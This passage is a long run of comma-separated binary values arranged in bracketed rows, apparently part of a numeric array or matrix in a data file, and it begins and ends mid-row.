0,1,1,1,0,1,1,0,0,1,1,1,1,1,1,0,1,1,1,0,0,1,1,1,0,0,0,1,1,1,0,1,0,1,1,0,1,1,1,1,0,1,1,1,0,0,1,0,0,1,1,0,1,1,0,1,1,0,0],[0,1,0,0,1,0,0,0,0,0,1,0,1,1,0,1,0,1,1,1,0,1,0,0,0,1,0,1,1,1,0,0,1,0,0,0,0,1,0,0,1,1,0,0,0,1,1,1,1,0,1,1,1,0,0,0,1,1,1,1,1,0,0,0,0,1,0,1,1,0,0,1,1,0,0,0,0,1,1,1,0,0,1,0,0,1,0,1,0,1,0,0,1,0,1,0,1,0,1,0,0,0,1,0,0,0,1,1,0,1,1,0,0,1,0,1,1,0,1,0,0,1,0,0,0,0,1,0,0,0,1,1,0,1,1,1,0,1,0,1,1,1,1,0,1,0,1,0,0,1,1,0,1,0,1,0,0,1,1,0,1,0,1,1,0,1,0,0,0,0,0,1,0,0,1,1,1,1,0,1,0,1,1,0,0,0,1,0,0,0,0,1,0,1,0,1,0,0,0,0,0,1,1],[1,0,0,0,1,0,1,1,0,1,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,1,1,0,1,0,0,0,0,1,0,0,1,1,1,0,1,1,0,1,1,0,0,0,0,1,1,0,0,0,0,0,1,0,1,0,0,0,0,0,1,1,0,1,0,1,0,0,1,1,1,1,1,1,0,1,0,0,0,1,1,1,0,0,0,1,1,0,0,1,1,1,0,0,0,0,0,0,1,1,1,1,1,1,0,0,0,1,0,0,1,0,0,1,0,1,1,0,0,0,0,1,0,0,0,1,1,1,0,0,1,1,0,1,0,1,0,1,0,0,1,1,0,0,0,0,1,1,1,1,0,1,0,1,1,1,1,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1,1,1,1,1,1,1,0,0,1,0,1,1,0,0,0,1,0,1,1,1,1,0,0],[0,0,0,1,0,0,1,1,1,1,0,1,1,1,0,0,0,
1,0,1,0,1,1,1,0,0,0,0,0,0,0,0,0,1,1,0,1,0,0,0,0,1,0,1,0,1,0,1,1,1,1,0,1,1,0,0,1,0,0,1,0,1,0,1,1,1,0,0,1,1,0,1,0,1,1,0,0,1,0,0,0,0,1,0,0,1,1,0,0,1,0,0,1,1,0,0,1,0,0,0,1,1,1,1,0,1,1,1,0,0,0,0,1,0,1,0,1,1,0,0,0,1,0,0,0,0,0,1,1,1,0,0,1,1,1,0,1,1,0,0,1,0,0,0,1,1,1,0,1,1,0,1,1,1,0,1,0,0,0,1,0,0,1,1,1,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,1,0,1,0,0,1,1,0,1,0,0,0,1,0,1,0,1,0,1,1,0,1,0],[0,0,1,1,0,0,0,1,1,1,1,0,0,0,1,0,0,1,0,1,1,1,0,1,0,1,1,0,0,0,0,0,1,0,1,0,1,1,0,0,0,0,1,1,1,1,0,1,0,0,0,0,0,0,1,1,1,1,1,0,0,1,0,1,0,0,0,1,1,1,1,1,1,0,1,0,0,0,1,1,0,0,0,1,1,0,1,1,1,1,1,1,0,0,0,0,0,1,0,1,1,1,1,1,0,0,0,1,1,0,1,0,0,0,0,0,0,1,1,0,0,1,0,1,1,0,0,1,0,1,0,1,1,0,0,1,1,1,1,0,1,1,1,0,1,0,0,1,1,1,0,0,1,1,1,0,0,0,1,0,1,1,1,0,0,1,1,1,1,1,1,0,1,1,0,0,0,0,1,1,1,1,0,0,0,0,0,0,0,1,0,1,1,1,1,1,0,0,1,1,0,0,0],[1,1,1,0,0,0,1,1,0,1,0,1,1,0,0,1,0,0,1,0,1,0,1,1,0,0,0,0,1,0,1,1,0,0,1,1,0,0,0,0,1,0,0,0,1,0,1,1,0,1,0,1,1,1,0,0,0,0,1,1,0,0,1,0,0,1,0,1,0,0,0,0,0,1,0,1,0,1,1,1,0,0,0,1,1,0,0,1,1,0,1,0,0,0,1,1,0,1,1,0,1,0,1,0,1,0,0,0,1,0,1,0,0,1,0,1,0,0,1,1,1,0,1,1,0,0,0,1,1,1,1,0,1,0,1,1,1,1,0,1,0,1,0,1,0,0,1,1,0,0,1,1,1,0,0,0,1,0,1,0,1,0,0,1,0,1,1,0,1,0,1,0,1,0,0,0,1,0,0,0,0,0,1,1,1,1,0,0,1,1,0,0,1,0,1,1,1,1,0,1,1,1,0],[1,0,1,0,0,0,0,1,1,0,0,1,1,0,1,0,0,1,1,0,0,1,0,1,0,1,1,0,1,1,0,0,0,0,1,0,0,0,0,1,0,0,0,1,1,1,1,0,0,0,0,1,0,1,1,1,0,0,0,1,1,0,1,0,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,1,1,1,0,1,1,0,0,0,0,1,1,0,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,1,1,1,0,1,0,0,0,1,0,1,1,0,1,1,0,1,0,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,0,1,0,0,1,0,1,1,0,0,0,1,1,0,0,1,1,1,0,0,0,1,1,1,0,1,0,0,0,0,1,0,0,1,1,1,1,0,1,0,1,1,0,0,0,1,1,0,0,0,1],[0,1,0,1,1,1,1,1,0,0,1,1,1,1,1,1,0,1,0,1,1,0,1,0,1,1,0,0,0,1,0,0,0,0,1,1,1,1,1,1,1,0,0,0,1,1,0,0,1,0,0,1,0,1,1,1,0,0,0,0,0,0,1,1,0,0,0,0,1,0,1,1,1,1,0,1,1,1,0,1,1,0,1,1,0,1,0,0,0,0,1,0,0,1,1,1,0,0,1,1,0,0,0,0,1,1,0,1,0,0,0,1,1,0,1,0,1,1,0,1,0,0,0,1,0,1,0,1,0,0,1,1,1,1,0,0,0,1,1,0,1,0,0,0,0,1,1,1,0,0,1,1,1,0,1,0,1,0,0,1,1,1,1,1,0,0,1,0,0,1,1,0,1,1,0,0,1,1,0,1,0,1,0,0,1,0,0,0,0,0,1,1,0,1,1,1,0,0,1,0,1,
1,1],[1,0,0,1,1,0,1,0,1,0,1,1,1,0,0,0,1,1,1,0,0,0,1,1,1,0,0,0,0,1,0,1,0,1,0,0,0,0,1,1,1,0,0,0,0,0,1,1,1,1,0,0,0,1,1,1,1,0,1,1,0,1,0,0,1,1,0,0,0,1,0,1,1,1,0,0,0,1,1,1,1,1,1,1,1,1,0,0,1,0,1,0,1,1,0,1,0,1,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,1,1,1,1,0,1,0,0,1,0,1,1,0,1,0,0,1,1,0,1,1,0,0,0,1,0,0,1,0,0,1,0,0,0,0,1,1,0,0,1,1,0,1,0,0,1,1,1,1,0,1,1,0,0,1,0,0,1,1,0,1,0,1,0,1,0,1,0,0,1,1,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,0,1],[1,0,1,0,1,0,1,1,0,0,0,0,1,0,1,0,0,1,0,0,0,0,0,1,0,0,1,1,0,0,0,1,1,0,0,0,0,1,0,0,0,1,1,0,1,0,1,0,0,1,1,0,0,0,0,1,0,0,0,0,1,0,1,0,1,1,1,0,1,0,1,0,0,1,0,1,1,0,1,1,0,0,0,0,0,1,1,1,0,1,1,0,0,1,0,1,1,0,0,0,1,0,0,1,1,0,1,1,0,0,1,1,1,1,0,0,0,1,1,0,1,0,1,0,0,0,0,0,1,1,0,1,0,1,0,0,1,1,1,0,0,1,0,1,1,1,0,0,1,0,0,0,1,1,0,1,0,1,0,1,0,1,0,0,1,1,1,1,1,0,0,0,1,1,0,1,1,1,0,1,0,0,0,1,0,0,0,1,0,0,1,1,0,0,0,1,0,1,0,1,1,0,0],[1,0,1,0,1,0,1,1,1,1,0,1,1,0,1,1,0,1,1,1,1,0,1,1,0,0,0,0,1,0,0,1,1,0,1,1,0,0,0,1,0,0,1,0,1,0,1,0,1,0,1,1,1,1,0,0,1,1,0,0,0,0,1,0,0,0,0,1,1,0,1,0,0,0,1,0,1,0,1,0,0,1,0,0,0,0,1,0,1,0,0,1,1,0,0,1,1,0,1,1,0,1,1,0,0,0,0,0,1,0,0,0,0,0,1,1,0,0,0,0,0,1,1,0,0,1,1,0,1,1,1,1,1,0,1,0,1,0,1,0,1,1,1,0,1,0,1,0,0,1,0,1,1,0,1,1,0,1,1,1,1,0,0,0,0,1,1,0,1,1,0,0,1,1,0,1,1,0,1,1,0,1,0,1,0,1,0,0,1,0,0,1,0,0,0,1,0,1,1,1,0,1,1],[1,0,0,0,0,1,1,0,0,1,0,0,0,1,0,1,0,1,0,0,0,0,1,0,1,0,0,1,0,0,1,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1,0,1,0,1,1,0,0,0,1,0,0,0,0,1,1,1,0,0,1,1,0,0,0,0,1,1,0,0,1,0,1,0,0,1,0,0,0,0,0,1,0,1,1,1,1,1,0,0,0,1,0,0,1,1,1,0,1,0,0,1,0,1,0,1,0,1,0,0,1,0,1,0,1,1,1,0,1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,0,0,1,0,0,0,1,1,1,0,0,1,1,1,0,1,0,1,1,0,0,1,0,1,0,1,1,1,1,1,0,1,1,1,1,0,1,0,1,0,1,1,1,1,0,0,0,0,0,0,0,1,0,1,1,1,1,1,0,0,1,0],[1,0,1,0,1,1,0,1,1,0,1,0,1,1,0,1,0,0,0,1,0,0,0,0,1,1,0,1,1,1,0,1,1,1,1,0,0,1,1,1,1,0,1,0,1,0,0,1,0,1,0,0,1,0,1,1,1,1,0,0,1,0,1,0,1,1,0,0,0,1,1,0,0,1,1,0,1,0,0,0,1,1,1,1,0,1,0,0,1,0,0,1,1,0,0,0,0,0,1,0,1,0,1,0,1,1,1,1,1,0,0,0,0,0,0,1,0,0,0,1,1,0,1,1,1,1,1,0,1,1,0,1,1,1,0,0,0,1,1,0,0,0,1,1,0,0,1,0,0,0,1,0,0,0,0,0,0,1,1,1,0,1,1,0,0,1,1,0,0,0,1,1,0,0,0,0,1,1,0,1,1,
1,0,0,1,0,1,1,1,1,1,1,0,0,1,0,0,1,0,0,0,1,1],[0,1,1,1,1,1,1,0,1,1,0,0,1,1,0,1,0,0,0,0,0,1,1,1,0,1,1,0,0,1,1,0,1,0,0,0,0,0,0,1,0,1,1,0,0,1,0,1,1,1,0,0,1,1,0,1,1,1,0,1,0,0,0,0,0,0,0,1,0,1,1,0,1,1,0,1,0,1,1,1,0,1,0,1,0,1,0,0,1,1,0,1,0,0,0,1,0,1,1,0,1,1,0,0,0,1,1,1,1,1,1,1,1,0,0,0,1,0,0,1,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,1,0,0,0,1,0,1,1,1,0,0,1,0,1,0,0,1,1,1,0,0,0,1,0,0,1,0,0,1,1,1,1,0,0,1,0,1,0,0,0,1,0,0,1,1,1,0,1,0,0,0,0,0,0,1,0,0,1,1,0,0,0,0,1,1],[1,0,1,1,0,0,0,1,0,0,0,1,1,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,1,0,0,0,0,1,0,0,0,0,1,1,0,0,1,1,0,0,0,0,1,1,1,0,0,1,1,0,0,1,1,1,1,1,0,1,1,1,1,0,0,1,1,0,1,1,0,0,0,0,1,0,1,0,1,1,0,1,1,1,0,1,1,0,0,1,1,1,1,0,1,0,1,0,1,1,0,0,1,1,0,1,0,0,0,1,1,1,0,1,0,1,0,1,1,1,1,0,1,0,0,1,0,1,1,0,1,1,0,0,0,0,0,0,0,1,1,1,0,1,0,0,1,1,1,1,1,0,1,0,1,1,0,0,0,1,0,1,1,0,1,1,1,0,1,0,0,0,0,1,0,0,1,0,1,0,0,1,0,1,1,0,0,0,0,0,1,1,0,1,0,1,1,0,1],[1,1,1,1,0,1,1,0,1,1,0,1,0,1,1,0,1,0,1,0,1,0,1,0,1,1,1,0,0,1,1,0,1,1,1,1,0,1,1,1,0,0,1,1,1,0,1,1,1,1,0,1,0,1,1,0,1,1,0,1,0,0,1,1,0,0,0,0,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,1,0,0,0,0,1,1,0,1,0,1,1,0,0,0,1,1,1,0,1,0,0,0,1,0,1,1,1,1,0,0,1,0,1,0,1,1,1,1,1,1,0,0,1,0,1,1,0,0,1,0,1,1,0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,1,0,1,1,0,1,0,1,0,1,1,0,0,0,0,1,0,1,0,0,1,0,1,0,1,0,0,0,0,1,1,1,1,0,0],[0,1,0,0,1,1,1,1,0,1,0,1,1,0,1,0,1,1,1,1,0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,1,1,1,1,0,1,0,1,1,1,1,1,1,1,1,1,1,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,1,1,0,0,0,0,0,1,0,1,1,1,1,1,0,0,0,0,0,1,1,1,0,1,1,1,0,0,1,1,1,0,1,1,1,0,0,1,1,0,1,0,1,0,0,0,0,0,1,0,0,0,0,1,1,1,1,1,0,1,0,1,1,0,1,1,1,1,1,1,1,0,0,1,1,1,1,1,0,0,1,1,1,1,0,0,1,0,1,0,1,1,0,0,0,1,1,0,0,0,0,0,1,0,1,1,0,0,0,1,1,0,0,1,1,1,1,0,1,0,0,1,0,0,1,0,0,0,0,0,0,1,1,0,1],[1,1,1,1,1,0,1,0,1,0,0,0,1,0,1,1,1,1,0,1,0,0,0,1,0,0,1,0,0,1,0,0,1,1,0,1,1,0,0,0,1,1,0,1,0,0,1,0,0,1,0,1,1,0,1,1,1,0,1,0,1,0,1,0,0,1,0,0,1,1,0,1,1,0,1,1,0,1,0,1,0,0,1,0,1,1,0,1,0,1,0,0,1,1,0,0,1,1,1,0,1,1,1,0,1,0,0,0,1,0,0,0,0,1,1,0,1,1,1,1,1,0,1,1,1,0,0,0,0,1,0,0,0,0,1,1,0,1,0,1,1,1,1,0,0,0,0,0,1,0,1,0,1,1,1,1,1,1,0,1,1,
1,1,0,1,1,1,1,0,1,0,0,0,0,0,0,0,1,1,1,0,1,1,0,1,0,1,1,0,0,0,0,0,0,1,1,1,1,0,0,0,0,0],[1,0,0,0,0,1,0,1,0,1,0,0,0,0,1,1,0,0,0,0,1,1,1,1,0,0,1,0,1,0,1,0,0,1,1,0,1,0,1,1,1,1,0,0,1,0,1,0,1,1,0,0,1,0,0,0,1,0,0,0,0,1,1,0,1,1,1,0,1,0,1,0,0,0,1,1,0,1,1,0,0,1,0,0,1,0,0,0,1,0,0,0,0,0,0,1,0,0,0,1,0,0,1,1,0,0,0,0,1,0,1,0,1,0,0,0,1,0,1,0,1,1,1,0,1,1,1,0,0,1,0,0,0,1,0,1,0,1,0,1,1,0,0,1,1,1,0,1,1,0,1,0,0,1,1,1,1,1,1,0,0,1,1,1,0,0,0,1,0,1,1,1,1,1,0,0,0,1,0,0,1,0,0,1,1,1,1,1,0,0,1,0,1,0,0,0,0,1,0,0,1,0,1],[0,1,1,0,1,1,0,0,1,1,1,1,1,0,1,0,1,1,1,0,0,0,0,1,0,0,0,0,1,0,1,0,1,1,0,0,1,0,0,1,0,0,0,1,0,0,0,0,1,1,0,1,0,1,1,1,1,1,0,0,0,1,1,0,1,1,1,0,0,1,1,0,1,1,0,0,1,0,0,0,0,0,0,1,1,0,1,1,0,1,1,0,0,0,0,0,1,0,1,1,0,0,1,1,0,0,1,1,1,1,1,0,0,1,0,0,0,1,1,0,0,0,1,0,0,0,1,0,0,1,1,1,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,1,0,1,0,0,1,0,1,1,1,1,1,1,1,0,0,1,1,1,0,1,1,1,0,1,0,1,0,0,1,0,0,1,0,1,0,0,1,1,0,0,0,0,1,0,1,0,1,0,0,1,1,0,1,0,1],[1,1,0,1,1,0,0,0,0,0,1,1,0,0,0,0,1,1,0,1,1,0,1,1,0,0,0,0,1,0,1,1,0,0,0,0,0,0,1,1,1,0,0,1,1,1,1,0,1,0,0,1,0,1,1,1,1,0,1,1,1,1,0,1,1,0,1,1,1,1,0,1,1,1,0,0,0,1,0,1,0,0,0,0,1,1,1,0,1,1,0,1,1,0,1,0,1,0,1,0,0,0,1,0,0,1,1,1,0,1,0,0,1,0,0,0,1,0,1,0,0,0,1,1,1,1,0,1,0,1,0,1,1,1,1,0,0,0,0,1,1,0,1,0,0,1,0,0,0,1,0,1,0,1,1,0,0,1,1,0,1,0,1,0,0,1,1,1,1,0,1,1,1,0,0,0,1,0,1,0,0,1,0,1,1,0,0,1,1,0,0,0,0,0,1,0,0,1,0,1,0,1,1],[0,0,1,0,0,0,0,0,0,0,0,1,0,1,0,1,0,0,0,1,0,0,0,1,0,1,1,0,0,0,1,0,1,1,0,1,1,1,1,1,0,1,1,0,1,1,0,1,0,1,1,0,0,0,1,1,0,1,1,0,0,0,1,0,1,0,1,0,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,1,1,0,0,1,0,1,0,0,0,1,1,1,0,0,0,0,1,1,1,0,1,1,1,0,0,1,0,1,0,0,0,0,0,0,0,0,1,0,1,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,0,1,0,1,0,0,1,0,1,0,1,1,1,0,1,1,1,0,1,1,1,1,0,0,0,0,1,0,1,0,1,1,1,0,0,1,1,1,0,0,1,1,1,1,0,1,0,1,1,1,0,0,1,0,1,1,1,1,1,1,1],[1,0,1,0,0,0,1,0,0,1,1,1,0,1,1,1,1,1,0,0,1,0,0,1,1,1,0,1,1,0,1,1,0,1,1,1,0,0,0,1,0,0,1,0,0,1,0,1,0,0,1,1,0,0,0,1,0,1,1,0,0,0,1,1,1,0,0,1,0,1,1,0,0,0,1,1,0,1,1,1,1,1,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,0,0,0,1,1,1,0,1,1,1,1,1,1,0,1,1,1,0,0,0,1,0,0,0,0,0,1,0,1,0,0,1,1,0,0,1,1,0,1,0,
0,1,1,0,0,0,0,0,0,1,1,0,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,1,1,1,0,0,0,0,1,1,1,1,1,0,0,0,0,1,0,1,1,0,1,1,1,0,1,0,0,0,0,0,1,0,0],[1,1,0,0,0,0,0,1,0,0,0,0,1,1,1,1,1,1,1,0,0,0,0,1,0,0,1,0,1,0,0,0,0,1,1,1,0,0,0,1,1,1,0,1,1,0,1,1,1,0,1,1,1,0,1,1,0,0,0,0,1,0,1,0,1,1,0,1,1,1,0,1,0,1,0,1,1,0,1,1,1,0,1,0,0,1,1,1,0,1,1,0,1,0,0,0,1,1,0,0,0,0,1,0,1,0,0,0,1,1,1,0,0,1,0,0,0,0,0,1,1,0,0,1,1,1,1,1,0,1,1,1,0,1,0,0,1,1,0,1,0,1,0,0,1,1,0,0,1,0,1,1,0,0,0,0,1,1,0,0,1,1,0,0,1,0,0,0,0,0,1,1,0,0,1,1,0,1,1,1,1,1,0,1,1,0,1,0,1,0,1,0,0,1,1,1,1,0,1,1,1,1,1],[0,1,0,1,0,1,1,0,0,1,0,0,0,1,1,1,0,0,1,1,0,0,0,1,1,1,0,1,1,1,0,0,0,1,1,0,0,0,0,1,0,0,0,0,1,0,1,0,0,1,0,1,0,1,0,0,1,0,1,0,0,0,1,0,0,1,0,0,0,0,1,0,0,0,0,1,0,1,0,1,0,1,1,1,0,0,0,0,1,1,0,0,0,0,0,1,1,0,1,1,1,1,1,0,1,0,1,1,1,1,0,1,1,0,1,1,0,1,0,0,1,1,1,1,1,0,0,0,1,1,0,0,1,0,0,1,1,1,0,0,1,0,0,1,0,0,0,0,1,1,0,0,1,1,1,0,0,1,1,0,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,1,0,1,1,0,1,1,0,1,1,1,0,0,1,1,1,1,1,1,1,1,1,0,0,1,0,1,0],[1,0,0,0,1,0,1,0,0,1,1,0,0,1,1,1,0,0,0,0,1,1,1,1,0,0,0,0,1,0,1,0,1,1,0,1,1,1,1,1,0,0,0,1,1,0,0,1,1,0,1,0,1,1,1,0,0,1,1,1,0,1,0,0,0,1,0,1,0,1,1,1,1,0,1,0,0,1,0,1,0,0,0,1,0,1,1,1,0,1,1,0,1,0,1,0,1,1,1,0,0,1,0,0,0,1,1,0,1,1,1,0,1,1,1,1,0,0,0,0,1,1,1,1,0,1,0,1,0,1,0,0,0,0,0,1,1,0,0,1,0,1,0,0,1,1,0,1,1,1,1,1,0,0,0,1,0,0,1,1,0,0,1,1,0,1,0,0,1,0,0,1,0,1,0,0,0,0,0,1,0,0,0,0,1,0,1,0,0,0,1,1,1,0,1,1,0,1,0,1,0,1,1],[1,1,0,1,0,1,1,0,1,0,0,1,0,1,1,1,0,1,1,0,0,0,0,0,0,1,1,1,0,0,0,0,0,1,0,1,1,1,0,1,0,1,1,0,0,1,1,0,0,1,1,0,1,1,1,0,1,0,1,0,1,0,0,1,0,1,0,0,0,1,0,1,0,1,0,1,0,1,1,1,1,0,1,0,1,0,1,0,0,0,1,1,0,0,1,0,1,0,0,0,1,0,0,1,1,1,1,0,1,1,0,0,0,1,1,1,0,0,1,1,0,0,0,0,0,1,0,1,0,0,1,0,0,1,0,0,0,0,0,1,1,0,1,0,1,1,1,0,0,1,1,1,1,0,1,1,0,0,0,1,1,1,0,1,1,1,0,0,1,0,1,0,1,1,1,1,1,0,0,1,0,0,0,0,0,1,1,1,0,1,1,1,1,1,1,0,0,0,0,0,1,0,1],[0,1,1,0,1,1,0,0,1,0,0,1,1,1,1,1,0,1,1,1,0,1,0,1,0,1,1,1,1,1,0,1,1,1,1,0,1,1,1,0,1,1,0,0,0,0,1,1,1,1,1,1,0,0,0,0,1,1,1,0,0,1,0,1,1,1,0,0,1,1,1,1,0,1,1,1,1,1,1,1,1,0,0,0,1,1,0,0,0,1,1,0,0,1,0,1,0,1,0,1,1,1,0,0,0,1,0,1,1,0,1,0,1,0,0,1,0,0,0,1,0,
1,0,1,1,1,1,1,0,0,0,1,0,0,0,0,0,1,1,0,1,1,0,0,1,0,1,1,0,1,1,1,0,0,1,0,1,1,1,1,1,1,0,0,1,0,1,1,1,1,1,0,1,0,0,0,0,0,0,1,1,0,1,1,1,1,1,1,1,1,0,1,0,0,0,1,1,1,1,0,0,0,1],[0,1,0,1,0,1,0,1,0,0,0,1,0,0,0,0,1,1,1,1,1,0,1,0,1,0,0,0,1,0,1,1,0,1,1,1,1,1,1,0,1,0,0,1,0,0,0,1,0,0,1,1,0,1,1,1,0,1,1,0,1,1,0,0,1,1,1,0,1,1,0,1,1,1,0,0,0,1,1,1,1,0,1,1,0,1,1,1,1,1,0,0,0,0,0,1,1,1,1,0,1,0,1,0,0,0,1,0,0,0,1,1,0,0,0,1,0,0,1,0,1,1,1,1,1,1,1,0,0,1,0,1,1,0,1,1,1,0,1,1,1,1,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,1,1,0,0,0,1,1,1,0,0,0,0,0,1,1,0,1,1,0,0,1,0,0,1,1,0,1,1,1,0,0,1,0,0,1,1,1,1,1,1,0,0],[0,1,1,1,1,0,0,1,1,1,0,0,0,1,0,0,1,1,1,0,1,0,0,1,0,1,1,1,1,1,1,0,0,0,1,1,1,1,0,0,1,1,0,0,1,1,1,0,0,1,1,0,1,0,1,0,1,1,0,0,1,0,0,0,0,1,0,0,0,1,0,0,0,1,0,1,1,1,1,1,0,0,1,1,1,0,1,1,1,0,0,0,0,1,0,0,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,0,1,1,1,1,0,0,0,1,1,1,0,1,1,0,0,1,0,1,0,0,0,0,1,1,1,1,0,0,1,1,0,0,0,0,1,0,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,1,1,1,1,0,1,1,1,0,1,0,1,0,0,1,0,1,1,1,0,0,1,1,0,1,0,1,1,1,1,1,0,1],[1,1,1,1,1,0,1,0,0,1,1,1,0,0,0,1,0,1,0,0,0,1,1,1,0,1,0,1,1,1,0,0,1,0,0,1,0,1,0,0,0,0,0,0,0,0,1,0,1,1,1,1,1,0,1,1,1,0,0,0,1,0,1,0,1,0,0,0,0,0,1,1,0,0,0,1,0,0,1,0,0,0,1,0,1,0,0,0,0,0,1,1,0,0,0,0,0,0,1,0,1,1,1,1,1,1,1,1,0,0,0,0,0,1,0,0,1,0,1,1,0,1,1,0,1,0,0,0,1,0,0,1,0,0,0,1,1,1,1,0,1,1,0,0,0,0,1,0,1,0,1,0,1,0,1,0,1,1,1,0,1,1,1,1,0,0,1,1,0,1,1,1,0,0,1,0,0,1,1,0,1,1,1,1,0,0,0,1,0,0,1,0,0,1,1,1,1,1,1,1,0,1,1],[0,1,0,0,0,1,1,1,0,0,0,1,0,0,1,1,1,1,0,1,0,1,0,1,1,0,0,1,1,0,1,0,1,0,1,1,0,1,0,0,0,0,1,0,0,1,1,1,0,1,1,0,1,0,1,1,1,0,0,0,1,1,1,0,1,0,1,1,0,1,0,0,1,1,1,1,0,0,0,1,0,1,0,1,0,0,0,1,0,0,1,0,0,0,1,0,0,1,1,0,0,1,1,1,0,1,1,1,1,0,1,1,1,1,0,0,0,1,1,0,1,1,1,0,1,1,1,0,0,1,0,0,1,1,0,1,0,0,1,0,1,0,0,1,1,0,0,1,1,0,0,1,0,1,0,0,1,0,0,0,0,0,1,0,1,0,0,0,1,0,0,1,1,1,0,0,0,0,1,1,1,0,0,1,1,0,1,1,0,1,0,0,1,0,0,0,1,1,0,1,1,0,0],[1,0,0,1,0,0,1,1,1,0,1,1,0,1,0,0,1,0,1,0,1,1,1,1,0,0,1,0,1,1,1,1,0,0,1,1,0,1,0,1,0,1,1,1,1,0,0,1,1,1,1,0,0,1,0,0,0,0,0,1,1,0,0,1,0,1,1,1,1,1,0,0,0,0,1,0,0,0,0,0,1,0,1,1,0,1,0,1,0,1,0,0,1,1,1,1,1,0,1,0,0,
1,1,1,0,0,1,1,0,1,0,1,0,0,0,1,0,0,0,1,1,0,0,0,1,1,0,0,0,0,1,1,0,1,0,0,0,1,1,1,1,1,1,0,0,0,0,0,0,0,1,1,1,1,1,0,0,0,1,1,1,0,0,0,0,1,1,0,1,0,0,1,0,1,1,1,0,0,0,0,1,1,1,0,1,0,0,1,0,1,0,1,1,1,0,1,0,0,1,1,0,1,1],[1,1,0,0,0,0,0,0,1,0,0,1,1,1,0,1,1,0,1,1,1,1,1,0,1,0,0,0,1,0,0,1,1,0,1,0,0,1,0,1,0,1,1,1,1,0,1,0,1,0,0,0,1,0,0,1,0,0,1,1,1,1,0,1,1,1,0,0,1,1,0,0,1,1,0,1,1,1,1,1,1,1,0,0,0,1,1,0,0,1,0,0,1,0,1,1,0,0,0,1,0,0,1,1,0,0,0,1,0,1,1,0,0,1,0,0,1,0,0,0,0,0,1,1,1,1,1,1,0,0,0,1,0,0,1,1,0,0,0,1,1,1,1,0,1,1,0,1,1,1,0,0,0,1,0,0,1,1,0,1,1,1,1,1,1,1,0,1,1,0,0,1,1,1,1,1,0,0,0,1,0,1,0,0,1,1,1,1,1,0,0,1,1,0,1,1,0,0,0,0,0,1,1],[0,0,0,1,1,1,1,1,1,1,0,1,1,1,0,0,1,1,1,1,0,1,0,0,1,0,1,1,0,1,1,0,1,1,0,0,0,0,0,0,0,1,1,1,1,1,0,0,0,0,0,1,0,0,0,1,1,1,1,0,1,0,0,0,0,1,1,0,0,1,0,1,0,0,1,1,0,1,0,0,0,0,0,1,1,0,0,1,0,0,0,1,0,0,1,1,0,0,1,0,1,1,1,0,0,1,1,0,1,1,0,0,1,1,0,1,1,1,1,1,1,0,0,1,0,1,0,1,0,1,0,0,1,0,1,0,0,1,1,0,0,0,0,0,0,0,1,0,1,1,0,1,1,0,1,0,0,0,1,1,0,1,1,0,1,0,0,0,1,1,1,1,0,1,0,1,0,0,1,0,1,1,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,1,0,0,1,1],[1,1,0,0,1,1,0,0,1,1,0,1,1,0,1,0,0,1,0,0,1,0,0,1,0,0,0,1,1,1,0,1,1,1,0,1,0,0,1,1,1,0,0,0,1,1,0,0,0,1,1,1,0,1,1,0,0,0,0,1,1,0,1,1,0,0,0,1,0,1,0,1,0,1,0,1,1,1,1,1,0,1,0,1,0,1,0,1,0,0,1,1,0,1,0,1,1,0,0,0,1,0,1,0,1,1,0,0,0,0,0,1,0,1,0,1,1,1,0,1,1,0,1,0,0,1,1,1,1,0,0,0,0,0,1,0,1,1,1,0,0,0,1,1,1,0,0,0,0,1,0,1,0,0,0,0,1,0,1,1,1,1,1,1,1,0,0,0,1,0,1,1,0,0,1,0,0,1,1,1,0,1,1,1,0,0,0,0,1,0,0,1,0,1,0,1,1,1,0,0,1,0,1],[0,0,1,1,1,1,0,1,1,1,1,1,1,0,1,1,1,0,0,1,0,1,0,0,1,0,1,1,1,1,1,0,1,1,0,0,0,1,0,1,0,1,0,0,0,1,1,1,0,1,1,1,0,1,1,0,0,1,1,1,1,0,0,1,1,1,1,1,1,0,1,0,0,0,1,0,0,0,1,0,1,0,1,1,1,1,0,0,1,1,1,1,1,1,1,1,0,0,1,1,0,1,0,1,1,0,1,0,1,0,1,0,1,0,1,0,1,0,0,0,0,1,1,0,0,0,1,1,0,1,1,0,1,0,1,0,1,0,1,0,0,1,1,0,1,0,0,0,0,1,1,0,0,0,0,0,0,1,1,1,0,1,0,1,1,1,1,0,1,1,1,1,1,1,1,1,0,1,0,1,0,1,1,0,1,1,0,1,0,0,1,1,0,1,1,1,0,1,0,1,0,1,1],[0,1,1,1,1,0,1,1,0,1,0,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,1,0,1,1,1,0,0,1,1,0,1,0,0,0,1,0,1,0,0,1,0,0,1,0,1,0,0,0,0,1,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,1,1,1,1,0,0,0,0,1,0,
